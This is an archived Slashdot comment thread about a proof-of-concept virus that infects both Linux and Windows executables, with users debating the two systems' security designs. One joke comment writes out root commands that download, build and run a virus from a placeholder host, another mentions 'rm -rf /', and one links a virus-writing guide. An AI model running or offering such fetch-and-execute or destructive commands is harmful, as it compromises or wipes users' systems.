
Ambidextrous Linux/Windows Virus

CmdrTaco posted more than 8 years ago | from the getting-it-from-both-ends dept.


Lam1969 writes "Kaspersky Labs has reported a new proof-of-concept virus that can infect both Windows and Linux systems. It's called Virus.Linux.Bi.a/Virus.Win32.Bi.a and affects ELF binaries and .exe's from windows. SANS has a brief item on the cross-platform virus as well, but no information about a patch or signature yet."


361 comments


Wow (-1, Redundant)

RagingFuryBlack (956453) | more than 8 years ago | (#15086767)

FIRST COMMENT. Never thought I'd see the day; well, yeah, I did. Props to he who did it. Let's see if these types begin to run rampant.

How is it POC? (4, Interesting)

liliafan (454080) | more than 8 years ago | (#15086768)

I guess it is time for me to double check clamav is still updating without any problems on my systems.

In 2001, the sadmind/ISS worm exploited a hole in Sun Microsystems Inc.'s Solaris to infect systems running vulnerable versions of the operating system. Infected systems then scanned for and attacked servers running Microsoft Corp.'s IIS Web server software. That same year, another proof-of-concept virus named Winux infected both Windows and Linux systems.


I am curious about how this is a proof-of-concept virus if it has been done before; surely the concept has already been proven?

Re:How is it POC? (0)

Anonymous Coward | more than 8 years ago | (#15086829)

It's a proof of concept because it doesn't actually do anything once it's infected a system.

Re:How is it POC? (1)

EndlessNameless (673105) | more than 8 years ago | (#15086896)

Anonymous coward bastard beat me to the punch because I wasted time checking to make sure it didn't actually have a payload.

:-p

Re:How is it POC? (4, Funny)

JordanL (886154) | more than 8 years ago | (#15086842)

I am curious about how this is a proof-of-concept virus if it has been done before; surely the concept has already been proven?

It wasn't slashdotted last time?

Re:How is it POC? (5, Informative)

EndlessNameless (673105) | more than 8 years ago | (#15086864)

It seems that the reason it's considered a POC at this point is because it has no real payload. All it does is spread, and not nearly as heinously as Blaster/Welchia/Sasser.

As soon as it gets backdoor or downloader functionality... then it becomes a more serious threat. And really you, me, and the guys at Secunia/SARC/SANS/ISC/etc all know that's where this is headed.

So yes... in the sense of where this particular piece of malware is headed, this is a proof-of-concept. It's a live test of the propagation mechanism. The payload will be dropped into place soon... probably in the next version, since this one looks like it's working fine.

Re:How is it POC? (0, Offtopic)

tktk (540564) | more than 8 years ago | (#15087272)

payload...

spread...

backdoor...

This must be the wet dreams of virus writers.

Payload complexity (0)

Anonymous Coward | more than 8 years ago | (#15087307)

But the payload would also need to be "ambidextrous". True, this isn't as hard as making the infection vector cross-platform, but it still requires some finesse.

Good thing Apple just switched to Intel processors, eh?

Re:How is it POC? (0)

Anonymous Coward | more than 8 years ago | (#15087244)

It might be a POC because of how the infection is taking place, not just that it is able to do it.

w32/similie anybody? (0)

Anonymous Coward | more than 8 years ago | (#15087314)

w32/similie, also known as linux/similie and metaphor, disassembles, optimizes, obfuscates, and reassembles itself, and infects win32 PE and linux ELF formats.

Netcraft confirms... (4, Funny)

Syberghost (10557) | more than 8 years ago | (#15086776)

...BSD just coughed up water and started breathing again.

Re:Netcraft confirms... (0)

Anonymous Coward | more than 8 years ago | (#15087045)

BSD uses ELF binaries also. Assuming you're running on Intel it should work fine there too.

I'll beat you to it.. (4, Funny)

JavaLord (680960) | more than 8 years ago | (#15086779)

100 bi jokes to follow

Re:I'll beat you to it.. (1)

BobVila (592015) | more than 8 years ago | (#15086888)

"I am not an ambi-turner." --Zoolander

Re:I'll beat you to it.. (5, Funny)

zpeterz63 (851922) | more than 8 years ago | (#15087298)

I'm not so sure...it could go either way.

Support (1)

mynickwastaken (690966) | more than 8 years ago | (#15086780)

So Microsoft will now need to support Linux with patches and updates in its effort to help the Linux server community around virtualization solutions.

Not to worry (1, Interesting)

shaitand (626655) | more than 8 years ago | (#15086784)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Re:Not to worry (5, Funny)

GrumblyStuff (870046) | more than 8 years ago | (#15086831)

Windows users are prepared for viruses...

What bizarro Earth are you from?

Re:Not to worry (1)

sedyn (880034) | more than 8 years ago | (#15086994)

I think he meant that Windows users are "expecting" them.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15086855)

Well, deleting all your documents doesn't really seem "minimal".

Sure, mom and pop won't have their harddrives erased, but losing all their photos is probably just as bad as far as they're concerned.

Re:Not to worry (1)

shaitand (626655) | more than 8 years ago | (#15087137)

Doubtful; losing docs just means replacing them. Nowadays even mom and pop have some form of backup, even if it is just photo CDs. Losing the system means money: either a new computer (if they do not have a tech they call) or calling a tech and paying him $65+/hr to fix their system for them.

As for users more informed than mom and pop, they have routine backups of their home directory at a minimum. They may or may not have backups of their tweaked configs.

Re:Not to worry (1)

squiggleslash (241428) | more than 8 years ago | (#15087240)

"Mom and Pop" back up every photo they get from their camera onto a freshly burnt photo CD? All (or most) "more informed" users run routine backups?

I'd love to live on your planet!

Re:Not to worry (1)

shaitand (626655) | more than 8 years ago | (#15087270)

Yup, mom and pop take the card from their digital camera to Walgreens, or CVS, or Walmart, etc., who then print them out on photo paper and give them a complimentary photo CD in place of a negative.

You didn't think mom and pop actually manipulate photos on their computer do you? If they are that advanced then yes, they back up their photos.

Re:Not to worry (5, Informative)

Rosco P. Coltrane (209368) | more than 8 years ago | (#15086880)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of. The reason Linux users don't sweat is because flaws are spotted quickly by many people who read the code, and fixed quickly too. That and people who code open-source tend to produce good code, as a matter of pride.

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

Re:Not to worry (2, Informative)

sbrown123 (229895) | more than 8 years ago | (#15086970)

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

Actually, most people run with the version of Windows that came installed on their computer. And these accounts are, to the best of my knowledge, always Admin.

Re:Not to worry (3, Insightful)

Creepy (93888) | more than 8 years ago | (#15087242)

Yeah, but even people that know about the "normal" user accounts quickly discover that almost all software written for windows doesn't handle non-admin accounts well. Ever try to install a program just in user space on Windows? If it works at all, you're lucky, and that isn't even scratching the surface of the problems. Got a network password? You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user. Do you have any idea what a MASSIVE pain in the ass that is, especially when I have 20-30 windows open (many are Exceed based X sessions) and am trying to get work done? After 2 months of that and multiple programs that plain wouldn't work if they weren't running as an admin user, I switched back to running exclusively as an admin on Windows.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15087294)

-
You can't just switch users to admin (like Linux) or use a sudo password (like Mac) - no, you need to log completely off of your user, then log on as the admin user, install the program, and log off as admin, then log back in as your regular user.
--

WTF?!?
"Run As..?"

I do run as a normal user with the secondary login service running, and this comment doesn't make sense.

Re:Not to worry (1)

clonmult (586283) | more than 8 years ago | (#15087250)

Thankfully I built all the PCs at home; apart from my profile, all the kids'/wife's sign-ons are user level. I set them as supervisor on the original setup, but it took me about, er, half an hour to realise that wasn't too good an idea.

In fact, the first win2k build I did on one of these PCs, I stupidly let it onto the net without A/V or a firewall. That only took about 5 to 10 minutes to get slightly compromised, 1 hour and it was pretty much fubar, but that's not exactly news.

Re:Not to worry (1)

ben there... (946946) | more than 8 years ago | (#15087309)

The account that is set up by default is Admin, but it only takes a quick trip to the Users control panel to add another (limited-access) user.

That said, most Windows users don't even know how to do that.

Re:Not to worry (2, Informative)

shaitand (626655) | more than 8 years ago | (#15087246)

"Actually, you're quite wrong. Linux flaws have existed and are still found today that can be (and have been) taken advantage of."

Actually that is pretty much in line with what I have said and does not make me wrong at all.

The system design and development model has led to two things: a shortage of privilege escalation flaws (flaws aren't good enough, they have to allow a user account to gain root under conditions the virus can create) and a short lifespan of any such flaws that exist.

Open source development leads to faster fixes; almost nobody who is not pushing an agenda argues this point anymore. Linux systems are far easier to keep up to date since they are almost entirely open source and free (speech+beer). The result is mechanisms like 'apt-get update; apt-get upgrade' that will update every piece of software on the system, whether OS, 3rd party service, or text editor.

This and a strong security model (execute capability must be explicitly enabled by a user who knows how to do it and has permission; default create masks do not make files executable; users ACTUALLY can only impact files they are supposed to be able to impact) make the spreading of viruses on Linux a non-issue. Flaws are patched faster than the viruses spread, damage is limited to a single user directory and even then only the data created since the last backup. Most clueless users are unable to execute the virus file in the first place because they are unable to set permissions.

grandchild.jpg.exe can never work on Linux, period. You have to get the user to open a prompt, cd to /home/granny/.email/files, then chmod +X grandchild.jpg.exe, THEN ./grandchild.jpg.exe (in Linux you have to create a launcher to execute a file in the GUI; double-clicking will not work).

"Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA,"

lol, if you say so. I challenge you to browse porn sites for a couple hours using IE under a user account. You will be amazed to find that spyware has spread beyond the one profile every time.

Re:Not to worry (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15087281)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Actually, you're quite wrong.


Actually, he is not.

The design of Linux is simply much better when it comes to security. If (when) a vulnerability is discovered in Linux, the inherent design of Linux usually limits what an exploit can do. Key among all of these is that very, very few things require escalation to system privileges to work. Most things run in user mode and are fenced off from critical system resources by that very fact. In general, without root access, whatever damage may be done is less than that possible with a Windows exploit.

Oh and by the way, Windows has a "safe"(well, safer) operating mode in the form of a user account, but nobody uses it because it's a PITA, so everybody stays in supervisor mode and bad things happen.

And the reason it is only a "safer" operating mode? Because so many silly things are wrapped into the OS that even user mode programs need to escalate to system privileges to do the simplest things. There are a thousand places where you know that an exploit in that area will automatically give you system privileges! By design, Windows is less secure. Microsoft is making strides (baby steps?) in this area now, but they are discussing and dealing with things that *nix designers dealt with 20 years ago.

I keep hearing the assertion that Linux is just as vulnerable as Windows in regards to viruses. By design, this simply is not true!

Wrong and right. (2, Insightful)

khasim (1285) | more than 8 years ago | (#15086904)

Windows users are prepared for viruses...
Sure they are.
...and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.
Pretty much.

Remember, it isn't about whether a virus exists for a specific platform or not.

It's whether you'll be infected or not.

And that is based upon the infection rate vs the removal rate. A virus that cannot spread faster than it is being removed will die.

Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.

Re:Wrong and right. (2)

heinousjay (683506) | more than 8 years ago | (#15087008)

Microsoft made a number of bad decisions (security-wise) in pursuit of "user friendly" systems.

To be fair, most Unixish system developers made a number of poor decisions usage-wise in pursuit of "secure" systems.

OS X seems to be the closest to blending the worlds, although it has some interesting foibles all its own. I look forward to the next ten years, because I think everyone is starting to get it all the way around. Uncharacteristically, I'm pretty damn optimistic.

Re:Not to worry (1, Informative)

Anonymous Coward | more than 8 years ago | (#15086914)

On Windows, most people (at least, home users) are sitting on admin; most people on Linux use this account only for configuration etc.

On the root account in *nix, you can do anything with the computer.
In Windows, this is the same.

Of course, there are bugs (something like gaining ring0 from user etc.) - but they exist on all systems, even BSD sometimes...

Why are *nix viruses so rare?
-these systems are less popular at home
-these systems are used by more experienced users (e.g. not clicking on NakedPamela.exe which arrived from 235gdsfge4@235cs.com ...)

The basic action of a virus - infecting files - can be done on all systems.
If a virus doing that thing is run on Linux, on a user account, it will infect all files with write permissions (/home/user ?). Same on Windows.

But if you ran it from an admin/root account...

The biggest weapon against such things is to use your brain... the OS is less important (of course, if you don't run 9x...).

Re:Not to worry (2, Informative)

halcyon1234 (834388) | more than 8 years ago | (#15087095)

Windows users are prepared for viruses and the reason Linux users do not sweat them much is not because linux viruses do not exist; it is because system design makes their impact minimal.

Yes and no. It isn't so much that Linux is a more secure operating system (an argument I won't touch with a 1010-foot pole). It is more that Linux is a more diverse operating system.

If I run Windows XP (perish the thought), and 1000 other people run Windows XP, we are all running the same operating system. Except for a patch or two, we are running the same code with the same holes. A virus that hits one hits us all.

Now, if I run Linux, and 1000 other people run Linux-- well, we aren't all running exactly the same OS. Red Hat, SuSE, live CDs, home brews-- each and every one is slightly different. Top that off with different modules, services, etc. running-- and you effectively have a large number of different operating systems. If malware exists that uses an exploit to propagate, chances are that it isn't going to hit all 1000 of us.

And yes, I know there's a distinction between a virus, a trojan horse, and a worm. But for the sake of argument, the malware I'm talking about is self-propagating and self-executing in some way. Anyone can write a shell script that does rm -rf / and trick at least a couple of people into running it.

The real vector that should be a concern for Linux users is cross-platform shares. Let's say you make your Linux box as secure as possible. No holes in any of the services, etc. Well, if you are on a mixed-OS network, and you Samba a Windows drive that is infected-- then you run the risk of being infected. Linux is just as vulnerable as Windows to malware once it has already been executed. So it is much easier to buffer overload the Windows box, and hope the virus gets Samba'd over to a Linux box.

Either that, or we all unplug from the net, power down, and encase our boxes in cement. 100% virus protection (though it would classify as a denial of service...)

Re:Not to worry (4, Insightful)

RzUpAnmsCwrds (262647) | more than 8 years ago | (#15087104)

it is because system design makes their impact minimal

Deleting everything in my home directory is anything but minimal.

Potentially exploiting local privilege elevation exploits to get root is anything but minimal.

Infecting software after it has been compiled is anything but minimal.

Using social engineering to get root is anything but minimal. How many users do you know who would enter their superuser password to "get free screensavers"? Too many.

Pretending that you're protected by design from the problem indicates that you don't understand how viruses really work. Guess what? You can run as a non-root user in Windows, too. But you can still do a ton of damage as a normal user. Spam relays and DDoS botnets don't need root access, just the ability to send data over the network. How about modifying your GNOME or KDE menu to point to a fake terminal entry or fake admin tools? How do you know that the "gnome-terminal-emulator" you're now typing your password into (through sudo) isn't actually stealing it?

This is the real world. Attackers are smart, they are motivated by profit (because of the spambot racket), and they have plenty of time to find the next buffer overrun.

Re:Not to worry (0)

Anonymous Coward | more than 8 years ago | (#15087236)

Actually, it's more that the vast majority of Windows users barely have a clue as to how to load a CD, much less set up firewalls and keep patched up. People who use Linux are either computer savvy enough to set it up right or they had somebody who is computer savvy set it up for them.

If a pop-up came up asking for admin privileges to do something, the average user will tell it okay and enter their password, no questions asked. This is Windows' biggest weakness... their target audience. If there were only skilled users then Windows computers wouldn't have such a range of problems. I know I've fended off a lot of stuff from my network just through configuring stuff properly, with only one or two incidents (and of course it was the idiots with full access through the firewalls clicking on stuff).

Whatever (4, Insightful)

AKAImBatman (238306) | more than 8 years ago | (#15086785)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Cue ominous thunder. (rolls eyes)

All this means is that data communications and storage has reached a point in time where no one (in theory) is going to notice that infected files get 3 or 4 megs chunkier. The virus writers still have to find vectors into these systems. If they can't find convenient vectors, then the ability to produce a fat binary is useless.

What is this need that security researchers have to claim that all systems are equally vulnerable? Are they worried they're going to be out of a job if everyone moves to more secure computing platforms? I mean, really. They should be encouraging mass migrations to other systems, as it diversifies the playing field and theoretically helps everyone remain safer. But I guess that's not their bread and butter.

Re:Whatever (2, Insightful)

CdBee (742846) | more than 8 years ago | (#15086821)

I'll be really impressed when someone comes up with an actual executable binary that contains code to run the appropriate installer on Linux or Windows - a cross-platform version of a Universal Binary

Re:Whatever (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15086832)

The virus writers still have to find vectors into these systems.
Human stupidity has worked so far; I do believe it will continue to work well into the foreseeable future.

Re:Whatever (4, Funny)

Tim C (15259) | more than 8 years ago | (#15086838)

If they can't find convenient vectors, then the ability to produce a fat binary is useless.

Unfortunately, there's a very convenient vector indeed sat at the keyboard of the vast majority of PCs.

Re:Whatever (3, Funny)

gEvil (beta) (945888) | more than 8 years ago | (#15086915)

"For those thinking their "pet" computer is invulnerable to the virus threat -- it's not," SANS said.

Dammit! And I thought using 70s technology [wikipedia.org] would keep me safe from all these modern-day viruses.

Amazing! (1, Insightful)

Anonymous Coward | more than 8 years ago | (#15086951)

Wow! This virus can infect PET [oldcomputers.net] computers? That really is cross-platform!

which architectures? (3, Interesting)

jon787 (512497) | more than 8 years ago | (#15086788)

The article says the worm was written in assembly and I assume it means x86 assembly. Can the worm infect non-x86 Linux hosts?

Re:which architectures? (1)

MindKata (957167) | more than 8 years ago | (#15086861)

Well, it's not infected my Vic20 running Linux yet... although I won't know for sure until it's finished booting up for the first time in 2009.

Re:which architectures? (3, Insightful)

molarmass192 (608071) | more than 8 years ago | (#15087031)

I think you answered your own question in a way: if the host has x86 emulation, then why wouldn't it be able to? That said, it's a long way from a POC to a real live virus. I can write a virus today and claim a POC; nobody has ever said that Linux is immune to viruses. Viruses aren't that complicated. That said, an effective (i.e. turn it loose and watch it spread) virus would be very difficult to achieve on Linux precisely because there isn't just one flavor of Linux, running the same binaries, on a single arch ... unlike another well known OS.

Re:which architectures? (1)

PCM2 (4486) | more than 8 years ago | (#15087215)

nobody has ever said that Linux is immune to viruses.
Well... people kinda do make that claim, all the time. They claim it about the Mac, too.

Re:which architectures? (1)

WinterSolstice (223271) | more than 8 years ago | (#15087303)

Having had a Javascript based 'virus' run on Safari, I can tell you that it certainly isn't virus proof. It's just a little different :)

Of course, it's reasonably easy to turn off js - not like ActiveX or something.

-WS

Does this mean.... (5, Funny)

da (93780) | more than 8 years ago | (#15086794)

... linux is ready for the desktop? [ducks]

Re:Does this mean.... (1)

creepynut (933825) | more than 8 years ago | (#15086828)

2006 really IS the year of Linux!

I've been hearing (1)

2names (531755) | more than 8 years ago | (#15087216)

a lot about this "Linux" program.

Will it run on my Windows PC?

Re:Does this mean.... (3, Insightful)

The Ape With No Name (213531) | more than 8 years ago | (#15086922)

No, but it is now ready for proof-of-concept cross-platform FUD.

huh? (0, Redundant)

fusto99 (939313) | more than 8 years ago | (#15086809)

But! But! I thought Linux was immune to viruses? *confused*

ELF huh? (1)

Rosco P. Coltrane (209368) | more than 8 years ago | (#15086812)

Let's just go back to a.out...

The article itself explains why this is so not (1)

mapkinase (958129) | more than 8 years ago | (#15086823)

...interesting.

Read the article:

Application of it is limited on Windows, and nobody is interested in writing viruses for Linux (so far).

The whole thing reminds me of clumsy HP OfficeJet, that magically combines together crappy fax, crappy printer, crappy copier and crappy scanner.

Proof of concept... Like it was challenging before...

Writing viruses for Linux is EASY. Getting them.. (3, Insightful)

Anonymous Coward | more than 8 years ago | (#15087026)

..to spread is the hard part.

How to write a Linux virus.
http://virus.enemy.org/virus-writing-HOWTO/_html/index.html [enemy.org]

There are numerous reasons why this is true.
Reasons include:
GNU/Linux is a minority platform.
GNU/Linux is highly fragmented.
GNU/Linux security is refined and updated often.
GNU/Linux users are more educated.
Windows has numerous security design flaws that promote viruses, which GNU/Linux systems don't have.
Windows has numerous user interface design flaws that promote viruses, which GNU/Linux doesn't have.

Although this WILL CHANGE if certain Pro-GUI factions get their way.

Like having Gnome and KDE user interfaces ignore the traditional Unix permissions for certain types of files... http://thread.gmane.org/gmane.linux.xdg.devel/7014 [gmane.org]

Damn stupid shit.

But as it stands now a combination of social and technical issues keeps Linux users safe.

One example of a flaw in Windows that causes easy transmission of viruses... Executable files are based on their file names, not based on a permission model.

And it's not just 'exe' or 'bat'.. Here is a partial list of executable file extensions in Windows.
ADE - Microsoft Access Project Extension
ADP - Microsoft Access Project
BAS - Visual Basic Class Module
BAT - Batch File
CHM - Compiled HTML Help File
CMD - Windows NT Command Script
COM - MS-DOS Application
CPL - Control Panel Extension
CRT - Security Certificate
DLL - Dynamic Link Library
DO* - Word Documents and Templates
EXE - Application
HLP - Windows Help File
HTA - HTML Applications
INF - Setup Information File
INS - Internet Communication Settings
ISP - Internet Communication Settings
JS - JScript File
JSE - JScript Encoded Script File
LNK - Shortcut
MDB - Microsoft Access Application
MDE - Microsoft Access MDE Database
MSC - Microsoft Common Console Document
MSI - Windows Installer Package
MSP - Windows Installer Patch
MST - Visual Test Source File
OCX - ActiveX Objects
PCD - Photo CD Image
PIF - Shortcut to MS-DOS Program
POT - PowerPoint Templates
PPT - PowerPoint Files
REG - Registration Entries
SCR - Screen Saver
SCT - Windows Script Component
SHB - Document Shortcut File
SHS - Shell Scrap Object
SYS - System Config/Driver
URL - Internet Shortcut (Uniform Resource Locator)
VB - VBScript File
VBE - VBScript Encoded Script File
VBS - VBScript Script File
WSC - Windows Script Component
WSF - Windows Script File
WSH - Windows Scripting Host Settings File
XL* - Excel Files and Templates

Good luck training users not to use those. And the fact that you can launch executable programs by double-clicking email attachments is another huge shitfest of bad designs.
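The extension list in the comment above is exactly what a mail gateway or attachment filter checks before a user ever gets the chance to double-click. The following is an added example, not code from the comment, from Kaspersky or from SANS: the extension set is copied from the list above (the two wildcard entries "DO*" and "XL*" are handled as prefixes), and the function names and the sample attachment names are assumptions. It also reports the double-extension trick mentioned earlier in the thread (grandchild.jpg.exe) separately, since the last extension decides what Windows runs but the inner one is what the user sees.

```python
"""Flag attachment names whose extension Windows treats as executable.

Added example, not from the Slashdot post. The extension set is copied
from the list in the comment above; function names and the constructed
sample file names are assumptions.
"""

# Exact extensions from the list, lower-cased, without the leading dot.
EXEC_EXTENSIONS = {
    "ade", "adp", "bas", "bat", "chm", "cmd", "com", "cpl", "crt", "dll",
    "exe", "hlp", "hta", "inf", "ins", "isp", "js", "jse", "lnk", "mdb",
    "mde", "msc", "msi", "msp", "mst", "ocx", "pcd", "pif", "pot", "ppt",
    "reg", "scr", "sct", "shb", "shs", "sys", "url", "vb", "vbe", "vbs",
    "wsc", "wsf", "wsh",
}
# The list's wildcard entries "DO*" and "XL*" (Word and Excel families).
EXEC_PREFIXES = ("do", "xl")


def is_executable_extension(ext):
    """True if Windows would launch a file with this extension on double-click."""
    ext = ext.lower().lstrip(".")
    return ext in EXEC_EXTENSIONS or any(ext.startswith(p) for p in EXEC_PREFIXES)


def classify_attachment(filename):
    """Report the effective extension, whether Windows would run it, and
    whether a harmless-looking inner extension hides that (photo.jpg.exe)."""
    # Last path component, tolerating both separators; trailing spaces and
    # dots are dropped because Windows strips them when it opens the file.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].rstrip(" .")
    parts = [p for p in base.lower().split(".") if p]
    if len(parts) < 2:  # no extension at all (README, .bashrc)
        return {"extension": "", "executable": False, "disguised": False}
    ext = parts[-1]
    executable = is_executable_extension(ext)
    # Executable last extension preceded by a non-executable one: the
    # user-visible name promises a document or picture.
    disguised = executable and len(parts) >= 3 and not is_executable_extension(parts[-2])
    return {"extension": ext, "executable": executable, "disguised": disguised}


def flag_attachments(names):
    """Return the subset of names a mail gateway should quarantine."""
    return [n for n in names if classify_attachment(n)["executable"]]


if __name__ == "__main__":
    # Constructed sample attachment names for the demonstration.
    sample = ["grandchild.jpg.exe", "NakedPamela.exe", "quarterly.xls",
              "report.pdf", "README", "notes.TXT.vbs", "invoice.exe."]
    for name in sample:
        print(f"{name:22} {classify_attachment(name)}")
    print("quarantine:", flag_attachments(sample))
```

Note that a name-based check is only the cheap first pass: it tells you what Windows would do with the file, not what the file is. Pairing it with a look at the file's header (ELF versus PE magic) catches the renamed binaries that a pure extension filter waves through.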

Impressive, but.... (1)

ankhcraft (811009) | more than 8 years ago | (#15086835)

While the article (and the proof of concept) is impressive, you do NOT have to limit yourself to assembly to end up with machine code that is OS neutral. You can write a freestanding C program, and only use assembly to navigate linkage to system calls. The rest of your logic can safely be in C.

Hands tied (1)

digitaldc (879047) | more than 8 years ago | (#15086836)

'It's important for enterprises to be aware of such issues and implement anti-virus tools for protecting non-Windows operating systems if they haven't done so already,' Ullrich said.

Sorry, I got my hands too tied up with the Ambidextrous virus to be implementing any tools right now!

How does it work? (2, Interesting)

Nazo-San (926029) | more than 8 years ago | (#15086843)

I'm kind of curious how it works. You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux. Some of the basics like cout do, but once you start getting a little more complicated and try to modify files, then it gets tricky. I'm guessing we aren't talking about a Java type thing (supposedly Java has securities in place, though I've never directly tested them -- I do know that it can delete or modify a file though). They mentioned ELF and Win32 executable binaries, so if it's Java, then that's just a frontend obviously. They wouldn't call it an ambidextrous virus if specific code were written for each OS though, right? The only single thing I can think of is maybe make a system call and run "del so-and-so", which in Linux's case would rely on an alias being in place to actually run rm.

Could anyone who knows more programming than I do (which, btw, isn't so hard so feel free to hop in here) give me just an idea of how this is even possible?

You know, suddenly I'm reminded of .hack. In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one, and that one was neither windows nor linux. Ok, it's just a story, but, do you suppose some nut wants to see if they can make this come true in their own way?

Re:How does it work? (3, Funny)

martinultima (832468) | more than 8 years ago | (#15086998)

“In it, one amazingly powerful virus was able to wipe out almost all major operating systems with the exception of the single one”


So, let's try guessing what the single one is... OpenBSD? :-)

Virus Writer 1: Hmm, let's see... first we have to crack the unbreakable encryption on the root password...

Virus Writer 2: No, you idiot! You can't do that until you've found a security vulnerability in the operating system itself!

1: Well, there is the guy running the machine in the first place...

2: Yeah, like anyone would install a secure operating system that requires insane amounts of technical experience and just spontaneously fall for some virus scam thing...

1: I guess you're right then... oh well, back to waiting for another security hole...

Re:How does it work? (1)

Nazo-San (926029) | more than 8 years ago | (#15087106)

No, the OS was an as yet uncreated ALTIMIT OS [wikipedia.org] (gee, I wonder if there was some kind of joke going on with the naming system here? Hmm...) Seriously though, it's just a story.

Oh yeah, speaking of ALTIMIT OS, it's supposed to come out next year according to the story. Get your fingers crossed, it's the one OS more stable than linux and it's good enough to replace linux, windows, mac osx, everything. ^_^

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087005)

You obviously must be an MCSE.

Zing!

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087069)

My guess is that it's a Windows virus that looks for Linux ELF binaries and modifies them if it can write to them. ELF is the Linux executable file format most widely used. The modified file executable can then do the same thing when used in Linux. It would probably look for critical ELF files executed with "root-permission" so that it can cause as much harm as possible.

Re:How does it work? (0)

Anonymous Coward | more than 8 years ago | (#15087119)

You can't just take, say, C++ and simply write the exact same code and it will work in both Windows and Linux.

Yes you can. Assuming the same processor architecture (eg. x86). The only thing that is different is the object format (PE on Windows, ELF or a.out on Linux/BSD/iOSX). No big deal.

Re:How does it work? (2, Funny)

x2A (858210) | more than 8 years ago | (#15087142)

The linux version comes with WINE ;-)

When it says 'linux and windows', it will no doubt mean linux-x86, which means that java type code isn't required, as the processor instructions are the same (it's apparently written in assembly code). System calls would have to be done differently, as would inserting the code into an elf/exe file to infect it. One way I guess would be to have different entry points into the code, the linux/windows machines would start running at a different point within the code, but when infecting a new file, it would copy both sections of code into it, rather than just the bit that's running. You could in theory make a virus that will spread to many more systems, but each one makes the resulting virus larger.

Re:How does it work? (1)

Nazo-San (926029) | more than 8 years ago | (#15087234)

I understood that. No, you're basically saying the thing I am. Is it really a truly "ambidextrous" virus if it relies on OS specific code for handling things like the actual file modification? It doesn't just get bigger with each new os, it gets massively more complex. Not just the code itself, getting it to actually WORK in each system bypassing securities. What I don't see here is in what way it is any different whatsoever from simply writing two virii, one for each os. That's less messy and easier to maintain anyway.

I don't know, I suppose if you just target linux and windows it might not be so bad, but, I definitely won't call this anything more than just a proof of concept.

Re:How does it work? (1)

x2A (858210) | more than 8 years ago | (#15087308)

The only thing that would make it different from having two separate viruses*, is that it can jump from one platform to another (eg, over a network or dual boot system), and back etc, so a windows machine behind a linux machine could still be infected and vice versa, when possibly it couldn't otherwise.

(* virus comes from latin, which is why many think you 'virii' it to make it plural. However, the latin word actually refers to a liquid, which would have quantity, not quantities, thus a latin plural is not strictly legal. The english word refers to an entity though, which can have a plural, so 'viruses' is more correct).

Re:How does it work? (1)

morgothan (201770) | more than 8 years ago | (#15087183)

unbreakable encryption on the root password? There is no such thing as unbreakable encryption. It just takes a very long time to break. Like 100 trillion years, but it is not unbreakable. Just as no safe is impenetrable. When you buy a safe, its rating is in time. Meaning that it would take this many hours for a determined person to break into it.

Re:How does it work? (2, Interesting)

alexhs (877055) | more than 8 years ago | (#15087191)

I will give two possibilities :
1. "universal binary" : compile code for each platform you want to infect. That one might even work on other architectures

Code needs :
a. an algorithm to know which OS/Arch an executable is for (and needs to know if a file is an executable in the first place)
b. an algorithm to link the appropriate code part.

You have a Win/x86 trojan. It checks for files and finds a PowerPC/Linux ELF. It adds itself to the end of the file, finds a jump in the original code, reroutes it to the PowerPC/Linux part of the virus code. At the end of the virus code, it does the appropriate jump so the original program still works.

2. checks for syscalls :
IA32 code (usually named x86) remains IA32 code, whatever your OS is. The biggest difference lies in syscalls.
have generic code (without syscall) checking what OS is running and set, say, CurrentOS. Each time you need a syscall, do a switch(CurrentOS) and execute the appropriate syscall.

How is it distributed? (1)

paladinwannabe2 (889776) | more than 8 years ago | (#15086847)

The article is sparse on details as to how the virus is distributed. It sounds like the virus is something that you actually have to run, so you won't pick it up just by visiting a website or reading an email. Anyone know more details about this?

Re:How is it distributed? (0)

Anonymous Coward | more than 8 years ago | (#15086913)

It is only proof of concept. Thus no delivery mechanism as of yet.

Re:How is it distributed? (5, Funny)

adnonsense (826530) | more than 8 years ago | (#15087082)

I have reverse-engineered the virus and discovered an insidious distribution mechanism:

root# wget http://warez.example.com/Virus.Linux.Bi.a.tgz
root# tar xzf Virus.Linux.Bi.a.tgz
root# cd Virus.Linux.Bi.a
root# ./configure --prefix=/usr/local/virii --with-natalie-portman=hot-grits --with-beowulf-cluster=yes
root# make && make install
root# PATH=$PATH:/usr/local/virii/bin
root# rehash
root# pwn3d &

I, for one (4, Funny)

sprag (38460) | more than 8 years ago | (#15086851)

welcome our new cross-platform proof-of-concept viral overlords.

It's almost like playing buzzword bingo.

Reactions: (4, Insightful)

Guppy06 (410832) | more than 8 years ago | (#15086872)

  1. Linux and Win32? W00t, my WfW3.11 box is invincible!
  2. So... why can't application developers do this?

Re:Reactions: (1)

gnud (934243) | more than 8 years ago | (#15086938)

1. Surprise, your 3.11 box is insignificant! 2. I'm guessing the virus does not do gui stuff.

Re:Reactions: (1)

Nazo-San (926029) | more than 8 years ago | (#15087054)

